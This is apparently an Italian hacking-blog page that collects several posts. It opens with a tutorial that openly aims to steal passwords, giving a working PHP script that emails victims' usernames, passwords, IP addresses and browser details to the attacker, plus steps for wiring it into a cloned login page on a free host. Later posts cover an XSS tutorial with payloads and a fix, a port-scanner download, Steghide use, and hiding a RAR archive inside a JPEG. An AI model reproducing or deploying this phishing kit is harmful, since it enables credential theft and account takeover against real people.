Fake Login
Ecco un bel post per i piu lamer...
Adesso impareremo a crare un fake login, ovvero un falso login. Utile per fregare password e dati personali.
Cominciamo...
Questo è il file.php che nel fake login viene chiamato login.php...
Copiate questo codice in blocco note e salvatelo come login.php e sostituite nel campo "$yourmail = "TuaEmail" la vostra E-mail...
Esempio:
$yourmail = "pincopallino@hotmail.it"
CODICE:
///////////////////////////////////
$yourmail = "TuaEmail"; //Inserisci qui il tuo indirizzo di posta
///////////////////////////////////
// DA QUI IN POI NON MODIFICARE NULLA!!
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$useragent=$_SERVER['HTTP_USER_AGENT'];
$td = date("F jS");
$date = date("d M Y");
$time = date("g:i a");
$LogTime = trim(" Date: ".$date.", Time: ".$time);
mail("$yourmail", "Account $account", "Username: $account \nPassword: $password \n\nIndirizzo IP: $ip \nData log: $LogTime \nSystem Info: $useragent \n\nDarthLord\nwww.msn.com","from: $account <$account>");
header( "Location: index.htm");
?>
--------------------------------------------------------------------------------
-Scaricate frontpage qui
-Dopo aver fatto ciò salvate la vostra pagina che volete rendere fake e salvatela come index.htm
-Aprite quest'ultima con frontpage
-Da Frontpage aprite la pagina che avete salvato
-Cliccate 2 volte col tasto sinistro sullo spazio di inserimento della e-mail e cambiate il nome con "account".
-Cliccate col tasto destro sempre sullo spazio di inserimento e-mail e fate "Proprietà modulo" poi "Opzioni" e mettere:
Azione: login.php
Metodo: POST
-Date ok e dinuovo ok
-Stessa cosa nella barra inserimento password, cliccate 2 volte con il sinistro e mettete come nome "password"
-Ora di nuovo cliccate col destro sullo spazio di inserimento password poi su "Proprietà modulo" e poi su "Opzioni" e mettere:
Azione: login.php
Metodo: POST
-Date ok e dinuovo ok
-Ora cliccate col destro sul pulsante "Accedi" e andate di nuovo in "Proprietà modulo" poi su "Opzioni" e mettere:
Azione: login.php
Metodo: POST
-Salvare la pagina con frontpage e uppate tutto su altervista... O altro sito che offre lo stesso servizio xD
Dovete uppare:
index_files (cartella)
index.htm
login.php
Indirizzate la vostra vittima sul login.php e andrà a finire sulla pagina fake.
Immagine alla cavolo xD
[Download] Port Scanner
Ecco una vera chicca, qualcosa di davvero spettacolare, un port scanner.
Logicamente sarebbe una cosa da nulla, se ne trova a migliaia su internet... Ma quanti di loro sono free e funzionano sempre e comunque?
Oggi vi posto un gran port scanner che è davvero buono. Trova qualunque porta, permette di scegliere quali porte scannerizzare
CONSIGLIO: mentre nel primo box mettete l'ip, nel secondo vuole l'ip remoto, se non lo avete, immettere lo stesso che avete messo nel primo, il port scanner funzionerà meglio.
Ecco una piccola immagine:
Download: http://rapidshare.com/files/333652859/pscan12.zip.html
Logicamente sarebbe una cosa da nulla, se ne trova a migliaia su internet... Ma quanti di loro sono free e funzionano sempre e comunque?
Oggi vi posto un gran port scanner che è davvero buono. Trova qualunque porta, permette di scegliere quali porte scannerizzare
CONSIGLIO: mentre nel primo box mettete l'ip, nel secondo vuole l'ip remoto, se non lo avete, immettere lo stesso che avete messo nel primo, il port scanner funzionerà meglio.
Ecco una piccola immagine:
Trovare e Fixare una XSS
Intanto cominciamo questa guida spiegando cosa sono le XSS quali sono i metodi usati per l'inniezione di codice javascript all'interno di una pagina.
Cosa è una xss?
Il Cross-site scripting (XSS) è una vulnerabilità che affligge siti web dinamici che impiegano un insufficiente controllo dell'input (parametri di richieste HTTP GET o contenuto di richieste HTTP POST). Un XSS permette ad un attaccante di inserire codice al fine di modificare il contenuto della pagina web visitata. In questo modo si potranno sottrarre dati sensibili presenti nel browser degli utenti che visiteranno successivamente quella pagina. Gli attacchi alle vulnerabilità XSS hanno effetti dirompenti per i siti con un elevato numero di utenti, dato che è sufficiente una sola compromissione per colpire chiunque visiti la stessa pagina.
Esistono due tipi di vulnerabilità XSS:
stored, nelle quali un attaccante è in grado di modificare permanentemente il contenuto di una pagina web, ad esempio inserendo un commento opportunamente preparato ad un post in un blog. reflected, grazie alle quali è possibile produrre un URL che, utilizzato sul sito vulnerabile, ne altererà il contenuto delle pagine in modo non permanente ed esclusivamente per le richieste HTTP che utilizzano tali URL appositamente forgiati. Questa vulnerabilità è dovuta a errori dei programmatori, che molto spesso trascurano completamente la validazione delle informazioni passate in input con le richieste HTTP
(By Wikipedia)
Tipi di attacchi:
Il metodo forse piu conosciuto per inniettare del codice javascript è quello di inserire del testo all'interno di una variabile che viene poi stampata dallo script della pagina..
Questo magari puo essere uno script comune per la ricerca di un argomento in un sito...
Codice: $search = $_GET['search']; ehco "Nessun risultato trovato per il termine $search\n"; ?>Una persona malintenzionata puo semplicemente inserire all'interno della variabile del codice javascript, che verrà stampato dallo script senza effettuare controlli..
quindi visitando questa pagina:
Codice:
http://sito.com/search.php?search= alert(1) Il risultato teoricamente sarebbe cosi:Codice:
Nessun risultato trovato per il termine alert(1)
Solo che essendo il risultato stampato direttamente sulla pagina allora il codice javascript sarà eseguito..
Ci sono altri metodi per effettuare un'xss..
Ci sono alcuni siti che visualizzano l'useragent del visitatore, dimenticando pero che anche l'user agent puo essere modificato..
Apriamo Mozilla, e andiamo su about:config
ora cerchiamo il parametro:
Codice: general.useragent.extra.firefoxe modifichiamolo con il solito codicino..:
Codice:
alert(1) Visitiamo la pagina che ci fa visualizzare l'useragent e.. sorpresa..
Vediamo ora com'è costruita una pagina vulnerabile che stampa l'useragent a schermo..
Codice:
$user_agent = $_SERVER['HTTP_USER_AGENT']; echo "Il tuo useragent è $user_agent\n"; ?>Di nuovo si capisce semplicissimamente come viene eseguita un'xss..
Un'altro metodo per inserire dei dati a livello utente che possono venire stampati è l'uso dei cookie..
Vediamo un po come fare..
Questo script serve solo per salutarci..
Codice:
$nick = $_COOKIE['user']; echo "Welcome $nick\n"; ?>Questo script legge il cookie con il nome 'user' e lo stampa a schermo..
E'molto semplice modificare i cookie, esiste anche un'addon di mozilla (Cookie Editor) che consente di modificare i cookie a proprio piacimento, quindi basta che mettiamo come valore di un cookie il solito codice:
Codice:
alert(1) E la nostra XSS è bella che eseguita..
Ora che abbiamo visto come effettuare un'XSS, vediamo ora come fare a fixarne una qualora ne avessimo una sul nostro sito..
Fixare un xss
Esiste una funzione apposita di PHP che si chiama htmlentities (stringa) che viene usata durante lo stampaggio a schermo di un testo per rimpiazzare i caratteri '<' e '>' con i loro corrispondenti caratteri speciali
che non verranno riconosciuti come codice dal browser e non verranno eseguiti...
Ora vediamo bene un'attimo come usare questa funzione...:
Codice:
$search = $_GET['search']; ehco "Nessun risultato trovato per il termine ".htmlentities($search)."\n"; ?>
In poche parole abbiamo applicato la funzione htmlentities durante lo stampaggio.. i ".funzione()." servono solo per concatenare il testo con la funzione..
Skype per Symbian
Skype ha rilasciato una versione del popolare software anche per cellulari Symbian 3rd edition. Ora quindi sarà possibile usufruire di telefonate gratuite non solo collegandosi al pc ma direttamente dal telefonino. Non solo semplici telefonate: chiamate di gruppo, invio/ricezione file e chat di gruppo, non saranno più un’esclusiva del computer.
Possiamo effettuare il download direttamente dal sito di Skype.I cellulari compatibili sono quelli che hanno:
Symbian S60 3rd Edition Feature Pack 1 devices: Nokia E51 ,Nokia E71,Nokia E63,Nokia E66,Nokia N82,Nokia N81,Nokia N818GB,Nokia E90,Nokia N95,Nokia N95 8GB.
Symbian S60 3rd Edition Feature Pack 2 devices: Nokia 5320,Nokia 6210 Navigator,Nokia 6210 Classic,Nokia N78,Nokia N79,Nokia N85,Nokia N96
Steganografia
La steganografia è una tecnica di sicurezza che viene di solito confusa con quella della crittografia. In realtà esiste una differenza ben precisa tra i due concetti.
Lo scopo della crittografia è quello di nascondere il contenuto di un messaggio, mentre la steganografia si prefigge di nasconderne l’esistenza. Essa nasce perché in molte situazioni il solo uso della crittografia non è sufficiente. Si pensi ad esempio ad un soldato che viene sorpreso a scambiare messaggi cifrati con un governo ostile: indipendentemente dal contenuto del messaggio, il solo fatto che vengono scambiati messaggi cifrati desta ovvi sospetti. Inoltre le restrizioni applicate dai vari governi ai sistemi crittografici hanno indotto a studiare metodi alternativi per lo scambio di messaggi privati, tra cui la stessa steganografia.
Lo studio di questa materia nella letteratura scientifica si deve a Simmons che nel 1983 formulò il “Problema dei prigionieri”. In questo scenario Alice e Bob sono in prigione e devono escogitare un piano per fuggire: tutti i loro messaggi vengono scambiati tramite il guardiano Willie. Se Willie scopre che essi si scambiano messaggi cifrati metterà uno di loro in isolamento ed il piano fallirà. Quindi essi devono trovare un metodo per nascondere il loro testo cifrato in un testo apparentemente innocuo.Per utilizzare tale tecnica si possono trovare in rete svariati tool multipiattaforma semplici da usare, anche se spesso non hanno finestre grafiche e possono essere utilizzati solo tramite riga di comando. Il programma che utilizzo personalmente è Steghide, disponibile per Linux ed anche per Windows. Il programma è gratuito e si può scaricare qui. Adesso vediamo i passi da seguire per utilizzarlo:
1) Scarichiamo la versione di Steghide per il nostro sistema operativo seguendo le istruzioni che troviamo sul sito linkato sopra (per chi usa Ubuntu basta scaricare Steghide da Synaptic)
2) Creiamo un file di testo in cui scrivere il nostro messaggio (frase, password, dati personali, ecc...)
2) Procuriamoci un' immagine JPEG o BMP, oppure un file audio WAV
3) Dalla riga di comando (terminale su Linux) scriveremo steghide embed -cf picture.jpg -ef secret.txt dove picture.jpg è la nostra immagine di copertura e secret.txt è il file di testo da nascondere. A questo punto dovremo inserire una parola chiave (che conosceremo solo noi ed il destinatario del messaggio segreto)... ed il gioco è fatto! Il nostro messaggio verrà prima crittato dal programma e poi nascosto nell' immagine (oppure nel file audio).
4) Se invece riceviamo un' immagine in cui è nascosto un messaggio segreto (deve dircelo ovviamente chi invia l'immagine) e vogliamo estrarlo dovremo scrivere steghide extract -sf picture.jpg dove picture.jpg è l'immagine che abbiamo ricevuto.
Non è così difficile, vero? Queste comunque sono le istruzioni più semplici che permettono di utilizzare immediatamente Steghide, ma i comandi supportati dal programma sono molti e permettono di sfruttare le grandi potenzialità del programma.
Nascondere Programmi Dentro Le Immagini
Allora, per prima cosa create un archivio .rar contenente il programma che volete nascondere. Poi spostate il rar e l'immagine nel quale vuoi nasconderlo nella stessa cartella ( vi consiglio in C:\ così fate prima). Una volta fatto questo, aprite il prompt dei comandi di windows (start-esegui-cmd) e spostatevi nella cartella dove avete messo i file (se li hai messi in C:\, basterà digitare "cd C:\" senza apici.) Fatto ciò, date il seguente comando:
CODICE
copy /b nome immagine.jpg + nome file.rar file nascosto.jpg
Dove: nome immagine.jpg sta per il nome dell'immagine che hai scelto, nome file.rar per il nome del file rar e file nascosto.jpg per il nome che vuoi dare all'immagine che conterrà il programma.
Alla fine dovreste ritrovarvi nella cartella C:\ l'immagine file nascosto.jpg. Cliccando sull'immagine si aprirà normalmente, mentre aprendola con winrar vedrete che conterrà il file che avete nascosto in essa.
Per i meno smanettoni:
Esiste un programma di nome camouflage che permette di nascondere il programma dentro un altro file e metterci pure una password quando si vuole tirarlo fuori, tutto con un semplice click
Dovete solo schiacciare col destro sul file da nascondere e fare "Camouflage" e mettere il file in cui metterlo e la password, mentre per toglierlo dovete cliccare col destro nel file in cui è nascosto quello che volete usare scegliere "Uncamouflage" e mettendo la password lo estrae.
DOWNLOAD
Iscriviti a:
Post (Atom)
